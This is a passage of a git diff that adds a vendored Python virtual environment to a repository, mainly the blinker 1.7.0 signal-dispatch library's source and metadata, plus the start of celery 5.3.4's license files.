or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS +OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF +MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. +IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY +CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, +TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE +SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/env/Lib/site-packages/blinker-1.7.0.dist-info/METADATA b/env/Lib/site-packages/blinker-1.7.0.dist-info/METADATA new file mode 100644 index 00000000..f96613c4 --- /dev/null +++ b/env/Lib/site-packages/blinker-1.7.0.dist-info/METADATA @@ -0,0 +1,62 @@ +Metadata-Version: 2.1 +Name: blinker +Version: 1.7.0 +Summary: Fast, simple object-to-object and broadcast signaling +Keywords: signal,emit,events,broadcast +Author-email: Jason Kirtland +Maintainer-email: Pallets Ecosystem +Requires-Python: >=3.8 +Description-Content-Type: text/x-rst +Classifier: Development Status :: 5 - Production/Stable +Classifier: Intended Audience :: Developers +Classifier: License :: OSI Approved :: MIT License +Classifier: Operating System :: OS Independent +Classifier: Programming Language :: Python +Classifier: Topic :: Software Development :: Libraries +Project-URL: Chat, https://discord.gg/pallets +Project-URL: Documentation, https://blinker.readthedocs.io +Project-URL: Homepage, https://blinker.readthedocs.io +Project-URL: Issue Tracker, https://github.com/pallets-eco/blinker/issues/ +Project-URL: Source Code, https://github.com/pallets-eco/blinker/ + +Blinker +======= + +Blinker provides a fast dispatching system that allows any number of +interested parties to subscribe to events, or "signals". + +Signal receivers can subscribe to specific senders or receive signals +sent by any sender. + +.. code-block:: pycon + + >>> from blinker import signal + >>> started = signal('round-started') + >>> def each(round): + ... print(f"Round {round}") + ... + >>> started.connect(each) + + >>> def round_two(round): + ... print("This is round two.") + ... + >>> started.connect(round_two, sender=2) + + >>> for round in range(1, 4): + ... started.send(round) + ... + Round 1! + Round 2! + This is round two. + Round 3! + + +Links +----- + +- Documentation: https://blinker.readthedocs.io/ +- Changes: https://blinker.readthedocs.io/#changes +- PyPI Releases: https://pypi.org/project/blinker/ +- Source Code: https://github.com/pallets-eco/blinker/ +- Issue Tracker: https://github.com/pallets-eco/blinker/issues/ + diff --git a/env/Lib/site-packages/blinker-1.7.0.dist-info/RECORD b/env/Lib/site-packages/blinker-1.7.0.dist-info/RECORD new file mode 100644 index 00000000..33cf5dc0 --- /dev/null +++ b/env/Lib/site-packages/blinker-1.7.0.dist-info/RECORD @@ -0,0 +1,14 @@ +blinker-1.7.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +blinker-1.7.0.dist-info/LICENSE.rst,sha256=nrc6HzhZekqhcCXSrhvjg5Ykx5XphdTw6Xac4p-spGc,1054 +blinker-1.7.0.dist-info/METADATA,sha256=kDgzPgrw4he78pEX88bSAqwYMVWrfUMk8QmNjekjg_U,1918 +blinker-1.7.0.dist-info/RECORD,, +blinker-1.7.0.dist-info/WHEEL,sha256=EZbGkh7Ie4PoZfRQ8I0ZuP9VklN_TvcZ6DSE5Uar4z4,81 +blinker/__init__.py,sha256=s75XaRDHwSDzZ21BZUOEkQDQIcQEyT8hT7vk3EhYFQU,408 +blinker/__pycache__/__init__.cpython-310.pyc,, +blinker/__pycache__/_saferef.cpython-310.pyc,, +blinker/__pycache__/_utilities.cpython-310.pyc,, +blinker/__pycache__/base.cpython-310.pyc,, +blinker/_saferef.py,sha256=kWOTIWnCY3kOb8lZP74Rbx7bR_BLVg4TjwzNCRLhKHs,9096 +blinker/_utilities.py,sha256=S2njKDmlBpK_yCK4RT8hq98hEj30I0TQCC5mNhtY22I,2856 +blinker/base.py,sha256=FqZmAI5YzuRrvRmye1Jb-utyVOjXtF5vUVP3-1u-HtU,20544 +blinker/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 diff --git a/env/Lib/site-packages/blinker-1.7.0.dist-info/WHEEL b/env/Lib/site-packages/blinker-1.7.0.dist-info/WHEEL new file mode 100644 index 00000000..3b5e64b5 --- /dev/null +++ b/env/Lib/site-packages/blinker-1.7.0.dist-info/WHEEL @@ -0,0 +1,4 @@ +Wheel-Version: 1.0 +Generator: flit 3.9.0 +Root-Is-Purelib: true +Tag: py3-none-any diff --git a/env/Lib/site-packages/blinker/__init__.py b/env/Lib/site-packages/blinker/__init__.py new file mode 100644 index 00000000..d014caa0 --- /dev/null +++ b/env/Lib/site-packages/blinker/__init__.py @@ -0,0 +1,19 @@ +from blinker.base import ANY +from blinker.base import NamedSignal +from blinker.base import Namespace +from blinker.base import receiver_connected +from blinker.base import Signal +from blinker.base import signal +from blinker.base import WeakNamespace + +__all__ = [ + "ANY", + "NamedSignal", + "Namespace", + "Signal", + "WeakNamespace", + "receiver_connected", + "signal", +] + +__version__ = "1.7.0" diff --git a/env/Lib/site-packages/blinker/_saferef.py b/env/Lib/site-packages/blinker/_saferef.py new file mode 100644 index 00000000..dcb70c18 --- /dev/null +++ b/env/Lib/site-packages/blinker/_saferef.py @@ -0,0 +1,230 @@ +# extracted from Louie, http://pylouie.org/ +# updated for Python 3 +# +# Copyright (c) 2006 Patrick K. O'Brien, Mike C. Fletcher, +# Matthew R. Scott +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions are +# met: +# +# * Redistributions of source code must retain the above copyright +# notice, this list of conditions and the following disclaimer. +# +# * Redistributions in binary form must reproduce the above +# copyright notice, this list of conditions and the following +# disclaimer in the documentation and/or other materials provided +# with the distribution. +# +# * Neither the name of the nor the names of its +# contributors may be used to endorse or promote products derived +# from this software without specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR +# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT +# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, +# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT +# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, +# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY +# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT +# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. +# +"""Refactored 'safe reference from dispatcher.py""" +import operator +import sys +import traceback +import weakref + + +get_self = operator.attrgetter("__self__") +get_func = operator.attrgetter("__func__") + + +def safe_ref(target, on_delete=None): + """Return a *safe* weak reference to a callable target. + + - ``target``: The object to be weakly referenced, if it's a bound + method reference, will create a BoundMethodWeakref, otherwise + creates a simple weakref. + + - ``on_delete``: If provided, will have a hard reference stored to + the callable to be called after the safe reference goes out of + scope with the reference object, (either a weakref or a + BoundMethodWeakref) as argument. + """ + try: + im_self = get_self(target) + except AttributeError: + if callable(on_delete): + return weakref.ref(target, on_delete) + else: + return weakref.ref(target) + else: + if im_self is not None: + # Turn a bound method into a BoundMethodWeakref instance. + # Keep track of these instances for lookup by disconnect(). + assert hasattr(target, "im_func") or hasattr(target, "__func__"), ( + f"safe_ref target {target!r} has im_self, but no im_func, " + "don't know how to create reference" + ) + reference = BoundMethodWeakref(target=target, on_delete=on_delete) + return reference + + +class BoundMethodWeakref: + """'Safe' and reusable weak references to instance methods. + + BoundMethodWeakref objects provide a mechanism for referencing a + bound method without requiring that the method object itself + (which is normally a transient object) is kept alive. Instead, + the BoundMethodWeakref object keeps weak references to both the + object and the function which together define the instance method. + + Attributes: + + - ``key``: The identity key for the reference, calculated by the + class's calculate_key method applied to the target instance method. + + - ``deletion_methods``: Sequence of callable objects taking single + argument, a reference to this object which will be called when + *either* the target object or target function is garbage + collected (i.e. when this object becomes invalid). These are + specified as the on_delete parameters of safe_ref calls. + + - ``weak_self``: Weak reference to the target object. + + - ``weak_func``: Weak reference to the target function. + + Class Attributes: + + - ``_all_instances``: Class attribute pointing to all live + BoundMethodWeakref objects indexed by the class's + calculate_key(target) method applied to the target objects. + This weak value dictionary is used to short-circuit creation so + that multiple references to the same (object, function) pair + produce the same BoundMethodWeakref instance. + """ + + _all_instances = weakref.WeakValueDictionary() # type: ignore[var-annotated] + + def __new__(cls, target, on_delete=None, *arguments, **named): + """Create new instance or return current instance. + + Basically this method of construction allows us to + short-circuit creation of references to already-referenced + instance methods. The key corresponding to the target is + calculated, and if there is already an existing reference, + that is returned, with its deletion_methods attribute updated. + Otherwise the new instance is created and registered in the + table of already-referenced methods. + """ + key = cls.calculate_key(target) + current = cls._all_instances.get(key) + if current is not None: + current.deletion_methods.append(on_delete) + return current + else: + base = super().__new__(cls) + cls._all_instances[key] = base + base.__init__(target, on_delete, *arguments, **named) + return base + + def __init__(self, target, on_delete=None): + """Return a weak-reference-like instance for a bound method. + + - ``target``: The instance-method target for the weak reference, + must have im_self and im_func attributes and be + reconstructable via the following, which is true of built-in + instance methods:: + + target.im_func.__get__( target.im_self ) + + - ``on_delete``: Optional callback which will be called when + this weak reference ceases to be valid (i.e. either the + object or the function is garbage collected). Should take a + single argument, which will be passed a pointer to this + object. + """ + + def remove(weak, self=self): + """Set self.isDead to True when method or instance is destroyed.""" + methods = self.deletion_methods[:] + del self.deletion_methods[:] + try: + del self.__class__._all_instances[self.key] + except KeyError: + pass + for function in methods: + try: + if callable(function): + function(self) + except Exception: + try: + traceback.print_exc() + except AttributeError: + e = sys.exc_info()[1] + print( + f"Exception during saferef {self} " + f"cleanup function {function}: {e}" + ) + + self.deletion_methods = [on_delete] + self.key = self.calculate_key(target) + im_self = get_self(target) + im_func = get_func(target) + self.weak_self = weakref.ref(im_self, remove) + self.weak_func = weakref.ref(im_func, remove) + self.self_name = str(im_self) + self.func_name = str(im_func.__name__) + + @classmethod + def calculate_key(cls, target): + """Calculate the reference key for this reference. + + Currently this is a two-tuple of the id()'s of the target + object and the target function respectively. + """ + return (id(get_self(target)), id(get_func(target))) + + def __str__(self): + """Give a friendly representation of the object.""" + return "{}({}.{})".format( + self.__class__.__name__, + self.self_name, + self.func_name, + ) + + __repr__ = __str__ + + def __hash__(self): + return hash((self.self_name, self.key)) + + def __nonzero__(self): + """Whether we are still a valid reference.""" + return self() is not None + + def __eq__(self, other): + """Compare with another reference.""" + if not isinstance(other, self.__class__): + return operator.eq(self.__class__, type(other)) + return operator.eq(self.key, other.key) + + def __call__(self): + """Return a strong reference to the bound method. + + If the target cannot be retrieved, then will return None, + otherwise returns a bound instance method for our object and + function. + + Note: You may call this method any number of times, as it does + not invalidate the reference. + """ + target = self.weak_self() + if target is not None: + function = self.weak_func() + if function is not None: + return function.__get__(target) + return None diff --git a/env/Lib/site-packages/blinker/_utilities.py b/env/Lib/site-packages/blinker/_utilities.py new file mode 100644 index 00000000..4b711c67 --- /dev/null +++ b/env/Lib/site-packages/blinker/_utilities.py @@ -0,0 +1,105 @@ +from __future__ import annotations + +import typing as t +from weakref import ref + +from blinker._saferef import BoundMethodWeakref + +IdentityType = t.Union[t.Tuple[int, int], str, int] + + +class _symbol: + def __init__(self, name): + """Construct a new named symbol.""" + self.__name__ = self.name = name + + def __reduce__(self): + return symbol, (self.name,) + + def __repr__(self): + return self.name + + +_symbol.__name__ = "symbol" + + +class symbol: + """A constant symbol. + + >>> symbol('foo') is symbol('foo') + True + >>> symbol('foo') + foo + + A slight refinement of the MAGICCOOKIE=object() pattern. The primary + advantage of symbol() is its repr(). They are also singletons. + + Repeated calls of symbol('name') will all return the same instance. + + """ + + symbols = {} # type: ignore[var-annotated] + + def __new__(cls, name): + try: + return cls.symbols[name] + except KeyError: + return cls.symbols.setdefault(name, _symbol(name)) + + +def hashable_identity(obj: object) -> IdentityType: + if hasattr(obj, "__func__"): + return (id(obj.__func__), id(obj.__self__)) # type: ignore[attr-defined] + elif hasattr(obj, "im_func"): + return (id(obj.im_func), id(obj.im_self)) # type: ignore[attr-defined] + elif isinstance(obj, (int, str)): + return obj + else: + return id(obj) + + +WeakTypes = (ref, BoundMethodWeakref) + + +class annotatable_weakref(ref): + """A weakref.ref that supports custom instance attributes.""" + + receiver_id: t.Optional[IdentityType] + sender_id: t.Optional[IdentityType] + + +def reference( # type: ignore[no-untyped-def] + object, callback=None, **annotations +) -> annotatable_weakref: + """Return an annotated weak ref.""" + if callable(object): + weak = callable_reference(object, callback) + else: + weak = annotatable_weakref(object, callback) + for key, value in annotations.items(): + setattr(weak, key, value) + return weak # type: ignore[no-any-return] + + +def callable_reference(object, callback=None): + """Return an annotated weak ref, supporting bound instance methods.""" + if hasattr(object, "im_self") and object.im_self is not None: + return BoundMethodWeakref(target=object, on_delete=callback) + elif hasattr(object, "__self__") and object.__self__ is not None: + return BoundMethodWeakref(target=object, on_delete=callback) + return annotatable_weakref(object, callback) + + +class lazy_property: + """A @property that is only evaluated once.""" + + def __init__(self, deferred): + self._deferred = deferred + self.__doc__ = deferred.__doc__ + + def __get__(self, obj, cls): + if obj is None: + return self + value = self._deferred(obj) + setattr(obj, self._deferred.__name__, value) + return value diff --git a/env/Lib/site-packages/blinker/base.py b/env/Lib/site-packages/blinker/base.py new file mode 100644 index 00000000..b9d70358 --- /dev/null +++ b/env/Lib/site-packages/blinker/base.py @@ -0,0 +1,558 @@ +"""Signals and events. + +A small implementation of signals, inspired by a snippet of Django signal +API client code seen in a blog post. Signals are first-class objects and +each manages its own receivers and message emission. + +The :func:`signal` function provides singleton behavior for named signals. + +""" +from __future__ import annotations + +import typing as t +from collections import defaultdict +from contextlib import contextmanager +from inspect import iscoroutinefunction +from warnings import warn +from weakref import WeakValueDictionary + +from blinker._utilities import annotatable_weakref +from blinker._utilities import hashable_identity +from blinker._utilities import IdentityType +from blinker._utilities import lazy_property +from blinker._utilities import reference +from blinker._utilities import symbol +from blinker._utilities import WeakTypes + +if t.TYPE_CHECKING: + import typing_extensions as te + + T_callable = t.TypeVar("T_callable", bound=t.Callable[..., t.Any]) + + T = t.TypeVar("T") + P = te.ParamSpec("P") + + AsyncWrapperType = t.Callable[[t.Callable[P, t.Awaitable[T]]], t.Callable[P, T]] + SyncWrapperType = t.Callable[[t.Callable[P, T]], t.Callable[P, t.Awaitable[T]]] + +ANY = symbol("ANY") +ANY.__doc__ = 'Token for "any sender".' +ANY_ID = 0 + +# NOTE: We need a reference to cast for use in weakref callbacks otherwise +# t.cast may have already been set to None during finalization. +cast = t.cast + + +class Signal: + """A notification emitter.""" + + #: An :obj:`ANY` convenience synonym, allows ``Signal.ANY`` + #: without an additional import. + ANY = ANY + + set_class: type[set] = set + + @lazy_property + def receiver_connected(self) -> Signal: + """Emitted after each :meth:`connect`. + + The signal sender is the signal instance, and the :meth:`connect` + arguments are passed through: *receiver*, *sender*, and *weak*. + + .. versionadded:: 1.2 + + """ + return Signal(doc="Emitted after a receiver connects.") + + @lazy_property + def receiver_disconnected(self) -> Signal: + """Emitted after :meth:`disconnect`. + + The sender is the signal instance, and the :meth:`disconnect` arguments + are passed through: *receiver* and *sender*. + + Note, this signal is emitted **only** when :meth:`disconnect` is + called explicitly. + + The disconnect signal can not be emitted by an automatic disconnect + (due to a weakly referenced receiver or sender going out of scope), + as the receiver and/or sender instances are no longer available for + use at the time this signal would be emitted. + + An alternative approach is available by subscribing to + :attr:`receiver_connected` and setting up a custom weakref cleanup + callback on weak receivers and senders. + + .. versionadded:: 1.2 + + """ + return Signal(doc="Emitted after a receiver disconnects.") + + def __init__(self, doc: str | None = None) -> None: + """ + :param doc: optional. If provided, will be assigned to the signal's + __doc__ attribute. + + """ + if doc: + self.__doc__ = doc + #: A mapping of connected receivers. + #: + #: The values of this mapping are not meaningful outside of the + #: internal :class:`Signal` implementation, however the boolean value + #: of the mapping is useful as an extremely efficient check to see if + #: any receivers are connected to the signal. + self.receivers: dict[IdentityType, t.Callable | annotatable_weakref] = {} + self.is_muted = False + self._by_receiver: dict[IdentityType, set[IdentityType]] = defaultdict( + self.set_class + ) + self._by_sender: dict[IdentityType, set[IdentityType]] = defaultdict( + self.set_class + ) + self._weak_senders: dict[IdentityType, annotatable_weakref] = {} + + def connect( + self, receiver: T_callable, sender: t.Any = ANY, weak: bool = True + ) -> T_callable: + """Connect *receiver* to signal events sent by *sender*. + + :param receiver: A callable. Will be invoked by :meth:`send` with + `sender=` as a single positional argument and any ``kwargs`` that + were provided to a call to :meth:`send`. + + :param sender: Any object or :obj:`ANY`, defaults to ``ANY``. + Restricts notifications delivered to *receiver* to only those + :meth:`send` emissions sent by *sender*. If ``ANY``, the receiver + will always be notified. A *receiver* may be connected to + multiple *sender* values on the same Signal through multiple calls + to :meth:`connect`. + + :param weak: If true, the Signal will hold a weakref to *receiver* + and automatically disconnect when *receiver* goes out of scope or + is garbage collected. Defaults to True. + + """ + receiver_id = hashable_identity(receiver) + receiver_ref: T_callable | annotatable_weakref + + if weak: + receiver_ref = reference(receiver, self._cleanup_receiver) + receiver_ref.receiver_id = receiver_id + else: + receiver_ref = receiver + sender_id: IdentityType + if sender is ANY: + sender_id = ANY_ID + else: + sender_id = hashable_identity(sender) + + self.receivers.setdefault(receiver_id, receiver_ref) + self._by_sender[sender_id].add(receiver_id) + self._by_receiver[receiver_id].add(sender_id) + del receiver_ref + + if sender is not ANY and sender_id not in self._weak_senders: + # wire together a cleanup for weakref-able senders + try: + sender_ref = reference(sender, self._cleanup_sender) + sender_ref.sender_id = sender_id + except TypeError: + pass + else: + self._weak_senders.setdefault(sender_id, sender_ref) + del sender_ref + + # broadcast this connection. if receivers raise, disconnect. + if "receiver_connected" in self.__dict__ and self.receiver_connected.receivers: + try: + self.receiver_connected.send( + self, receiver=receiver, sender=sender, weak=weak + ) + except TypeError as e: + self.disconnect(receiver, sender) + raise e + if receiver_connected.receivers and self is not receiver_connected: + try: + receiver_connected.send( + self, receiver_arg=receiver, sender_arg=sender, weak_arg=weak + ) + except TypeError as e: + self.disconnect(receiver, sender) + raise e + return receiver + + def connect_via( + self, sender: t.Any, weak: bool = False + ) -> t.Callable[[T_callable], T_callable]: + """Connect the decorated function as a receiver for *sender*. + + :param sender: Any object or :obj:`ANY`. The decorated function + will only receive :meth:`send` emissions sent by *sender*. If + ``ANY``, the receiver will always be notified. A function may be + decorated multiple times with differing *sender* values. + + :param weak: If true, the Signal will hold a weakref to the + decorated function and automatically disconnect when *receiver* + goes out of scope or is garbage collected. Unlike + :meth:`connect`, this defaults to False. + + The decorated function will be invoked by :meth:`send` with + `sender=` as a single positional argument and any ``kwargs`` that + were provided to the call to :meth:`send`. + + + .. versionadded:: 1.1 + + """ + + def decorator(fn: T_callable) -> T_callable: + self.connect(fn, sender, weak) + return fn + + return decorator + + @contextmanager + def connected_to( + self, receiver: t.Callable, sender: t.Any = ANY + ) -> t.Generator[None, None, None]: + """Execute a block with the signal temporarily connected to *receiver*. + + :param receiver: a receiver callable + :param sender: optional, a sender to filter on + + This is a context manager for use in the ``with`` statement. It can + be useful in unit tests. *receiver* is connected to the signal for + the duration of the ``with`` block, and will be disconnected + automatically when exiting the block: + + .. code-block:: python + + with on_ready.connected_to(receiver): + # do stuff + on_ready.send(123) + + .. versionadded:: 1.1 + + """ + self.connect(receiver, sender=sender, weak=False) + try: + yield None + finally: + self.disconnect(receiver) + + @contextmanager + def muted(self) -> t.Generator[None, None, None]: + """Context manager for temporarily disabling signal. + Useful for test purposes. + """ + self.is_muted = True + try: + yield None + except Exception as e: + raise e + finally: + self.is_muted = False + + def temporarily_connected_to( + self, receiver: t.Callable, sender: t.Any = ANY + ) -> t.ContextManager[None]: + """An alias for :meth:`connected_to`. + + :param receiver: a receiver callable + :param sender: optional, a sender to filter on + + .. versionadded:: 0.9 + + .. versionchanged:: 1.1 + Renamed to :meth:`connected_to`. ``temporarily_connected_to`` was + deprecated in 1.2 and will be removed in a subsequent version. + + """ + warn( + "temporarily_connected_to is deprecated; use connected_to instead.", + DeprecationWarning, + ) + return self.connected_to(receiver, sender) + + def send( + self, + *sender: t.Any, + _async_wrapper: AsyncWrapperType | None = None, + **kwargs: t.Any, + ) -> list[tuple[t.Callable, t.Any]]: + """Emit this signal on behalf of *sender*, passing on ``kwargs``. + + Returns a list of 2-tuples, pairing receivers with their return + value. The ordering of receiver notification is undefined. + + :param sender: Any object or ``None``. If omitted, synonymous + with ``None``. Only accepts one positional argument. + :param _async_wrapper: A callable that should wrap a coroutine + receiver and run it when called synchronously. + + :param kwargs: Data to be sent to receivers. + """ + if self.is_muted: + return [] + + sender = self._extract_sender(sender) + results = [] + for receiver in self.receivers_for(sender): + if iscoroutinefunction(receiver): + if _async_wrapper is None: + raise RuntimeError("Cannot send to a coroutine function") + receiver = _async_wrapper(receiver) + result = receiver(sender, **kwargs) + results.append((receiver, result)) + return results + + async def send_async( + self, + *sender: t.Any, + _sync_wrapper: SyncWrapperType | None = None, + **kwargs: t.Any, + ) -> list[tuple[t.Callable, t.Any]]: + """Emit this signal on behalf of *sender*, passing on ``kwargs``. + + Returns a list of 2-tuples, pairing receivers with their return + value. The ordering of receiver notification is undefined. + + :param sender: Any object or ``None``. If omitted, synonymous + with ``None``. Only accepts one positional argument. + :param _sync_wrapper: A callable that should wrap a synchronous + receiver and run it when awaited. + + :param kwargs: Data to be sent to receivers. + """ + if self.is_muted: + return [] + + sender = self._extract_sender(sender) + results = [] + for receiver in self.receivers_for(sender): + if not iscoroutinefunction(receiver): + if _sync_wrapper is None: + raise RuntimeError("Cannot send to a non-coroutine function") + receiver = _sync_wrapper(receiver) + result = await receiver(sender, **kwargs) + results.append((receiver, result)) + return results + + def _extract_sender(self, sender: t.Any) -> t.Any: + if not self.receivers: + # Ensure correct signature even on no-op sends, disable with -O + # for lowest possible cost. + if __debug__ and sender and len(sender) > 1: + raise TypeError( + f"send() accepts only one positional argument, {len(sender)} given" + ) + return [] + + # Using '*sender' rather than 'sender=None' allows 'sender' to be + # used as a keyword argument- i.e. it's an invisible name in the + # function signature. + if len(sender) == 0: + sender = None + elif len(sender) > 1: + raise TypeError( + f"send() accepts only one positional argument, {len(sender)} given" + ) + else: + sender = sender[0] + return sender + + def has_receivers_for(self, sender: t.Any) -> bool: + """True if there is probably a receiver for *sender*. + + Performs an optimistic check only. Does not guarantee that all + weakly referenced receivers are still alive. See + :meth:`receivers_for` for a stronger search. + + """ + if not self.receivers: + return False + if self._by_sender[ANY_ID]: + return True + if sender is ANY: + return False + return hashable_identity(sender) in self._by_sender + + def receivers_for( + self, sender: t.Any + ) -> t.Generator[t.Callable[[t.Any], t.Any], None, None]: + """Iterate all live receivers listening for *sender*.""" + # TODO: test receivers_for(ANY) + if self.receivers: + sender_id = hashable_identity(sender) + if sender_id in self._by_sender: + ids = self._by_sender[ANY_ID] | self._by_sender[sender_id] + else: + ids = self._by_sender[ANY_ID].copy() + for receiver_id in ids: + receiver = self.receivers.get(receiver_id) + if receiver is None: + continue + if isinstance(receiver, WeakTypes): + strong = receiver() + if strong is None: + self._disconnect(receiver_id, ANY_ID) + continue + receiver = strong + yield receiver # type: ignore[misc] + + def disconnect(self, receiver: t.Callable, sender: t.Any = ANY) -> None: + """Disconnect *receiver* from this signal's events. + + :param receiver: a previously :meth:`connected` callable + + :param sender: a specific sender to disconnect from, or :obj:`ANY` + to disconnect from all senders. Defaults to ``ANY``. + + """ + sender_id: IdentityType + if sender is ANY: + sender_id = ANY_ID + else: + sender_id = hashable_identity(sender) + receiver_id = hashable_identity(receiver) + self._disconnect(receiver_id, sender_id) + + if ( + "receiver_disconnected" in self.__dict__ + and self.receiver_disconnected.receivers + ): + self.receiver_disconnected.send(self, receiver=receiver, sender=sender) + + def _disconnect(self, receiver_id: IdentityType, sender_id: IdentityType) -> None: + if sender_id == ANY_ID: + if self._by_receiver.pop(receiver_id, False): + for bucket in self._by_sender.values(): + bucket.discard(receiver_id) + self.receivers.pop(receiver_id, None) + else: + self._by_sender[sender_id].discard(receiver_id) + self._by_receiver[receiver_id].discard(sender_id) + + def _cleanup_receiver(self, receiver_ref: annotatable_weakref) -> None: + """Disconnect a receiver from all senders.""" + self._disconnect(cast(IdentityType, receiver_ref.receiver_id), ANY_ID) + + def _cleanup_sender(self, sender_ref: annotatable_weakref) -> None: + """Disconnect all receivers from a sender.""" + sender_id = cast(IdentityType, sender_ref.sender_id) + assert sender_id != ANY_ID + self._weak_senders.pop(sender_id, None) + for receiver_id in self._by_sender.pop(sender_id, ()): + self._by_receiver[receiver_id].discard(sender_id) + + def _cleanup_bookkeeping(self) -> None: + """Prune unused sender/receiver bookkeeping. Not threadsafe. + + Connecting & disconnecting leave behind a small amount of bookkeeping + for the receiver and sender values. Typical workloads using Blinker, + for example in most web apps, Flask, CLI scripts, etc., are not + adversely affected by this bookkeeping. + + With a long-running Python process performing dynamic signal routing + with high volume- e.g. connecting to function closures, "senders" are + all unique object instances, and doing all of this over and over- you + may see memory usage will grow due to extraneous bookkeeping. (An empty + set() for each stale sender/receiver pair.) + + This method will prune that bookkeeping away, with the caveat that such + pruning is not threadsafe. The risk is that cleanup of a fully + disconnected receiver/sender pair occurs while another thread is + connecting that same pair. If you are in the highly dynamic, unique + receiver/sender situation that has lead you to this method, that + failure mode is perhaps not a big deal for you. + """ + for mapping in (self._by_sender, self._by_receiver): + for _id, bucket in list(mapping.items()): + if not bucket: + mapping.pop(_id, None) + + def _clear_state(self) -> None: + """Throw away all signal state. Useful for unit tests.""" + self._weak_senders.clear() + self.receivers.clear() + self._by_sender.clear() + self._by_receiver.clear() + + +receiver_connected = Signal( + """\ +Sent by a :class:`Signal` after a receiver connects. + +:argument: the Signal that was connected to +:keyword receiver_arg: the connected receiver +:keyword sender_arg: the sender to connect to +:keyword weak_arg: true if the connection to receiver_arg is a weak reference + +.. deprecated:: 1.2 + +As of 1.2, individual signals have their own private +:attr:`~Signal.receiver_connected` and +:attr:`~Signal.receiver_disconnected` signals with a slightly simplified +call signature. This global signal is planned to be removed in 1.6. + +""" +) + + +class NamedSignal(Signal): + """A named generic notification emitter.""" + + def __init__(self, name: str, doc: str | None = None) -> None: + Signal.__init__(self, doc) + + #: The name of this signal. + self.name = name + + def __repr__(self) -> str: + base = Signal.__repr__(self) + return f"{base[:-1]}; {self.name!r}>" # noqa: E702 + + +class Namespace(dict): + """A mapping of signal names to signals.""" + + def signal(self, name: str, doc: str | None = None) -> NamedSignal: + """Return the :class:`NamedSignal` *name*, creating it if required. + + Repeated calls to this function will return the same signal object. + + """ + try: + return self[name] # type: ignore[no-any-return] + except KeyError: + result = self.setdefault(name, NamedSignal(name, doc)) + return result # type: ignore[no-any-return] + + +class WeakNamespace(WeakValueDictionary): + """A weak mapping of signal names to signals. + + Automatically cleans up unused Signals when the last reference goes out + of scope. This namespace implementation exists for a measure of legacy + compatibility with Blinker <= 1.2, and may be dropped in the future. + + .. versionadded:: 1.3 + + """ + + def signal(self, name: str, doc: str | None = None) -> NamedSignal: + """Return the :class:`NamedSignal` *name*, creating it if required. + + Repeated calls to this function will return the same signal object. + + """ + try: + return self[name] # type: ignore[no-any-return] + except KeyError: + result = self.setdefault(name, NamedSignal(name, doc)) + return result # type: ignore[no-any-return] + + +signal = Namespace().signal diff --git a/env/Lib/site-packages/blinker/py.typed b/env/Lib/site-packages/blinker/py.typed new file mode 100644 index 00000000..e69de29b diff --git a/env/Lib/site-packages/celery-5.3.4.dist-info/INSTALLER b/env/Lib/site-packages/celery-5.3.4.dist-info/INSTALLER new file mode 100644 index 00000000..a1b589e3 --- /dev/null +++ b/env/Lib/site-packages/celery-5.3.4.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/env/Lib/site-packages/celery-5.3.4.dist-info/LICENSE b/env/Lib/site-packages/celery-5.3.4.dist-info/LICENSE new file mode 100644 index 00000000..93411068 --- /dev/null +++ b/env/Lib/site-packages/celery-5.3.4.dist-info/LICENSE @@ -0,0 +1,55 @@ +Copyright (c) 2017-2026 Asif Saif Uddin, core team & contributors. All rights reserved. +Copyright (c) 2015-2016 Ask Solem & contributors. All rights reserved. +Copyright (c) 2012-2014 GoPivotal, Inc. All rights reserved. +Copyright (c) 2009, 2010, 2011, 2012 Ask Solem, and individual contributors. All rights reserved. + +Celery is licensed under The BSD License (3 Clause, also known as +the new BSD license). The license is an OSI approved Open Source +license and is GPL-compatible(1). + +The license text can also be found here: +http://www.opensource.org/licenses/BSD-3-Clause + +License +======= + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + * Redistributions of source code must retain the above copyright + notice, this list of conditions and the following disclaimer. + * Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + * Neither the name of Ask Solem, nor the + names of its contributors may be used to endorse or promote products + derived from this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL Ask Solem OR 